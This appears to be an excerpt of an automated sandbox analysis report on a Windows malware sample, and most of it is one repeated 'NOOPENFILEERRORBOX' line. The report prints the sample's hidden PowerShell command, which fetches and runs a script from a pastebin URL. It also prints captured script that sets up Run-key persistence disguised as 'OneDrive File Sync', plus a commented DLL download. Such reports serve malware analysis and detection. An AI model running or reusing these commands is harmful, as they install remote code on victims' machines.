Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887982558 push E8FFFFFFh; iretd 11_2_00007FF88798255D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887A46DC3 push edi; iretd 11_2_00007FF887A46DC6

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$desusertion = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $desusertionmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,
0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
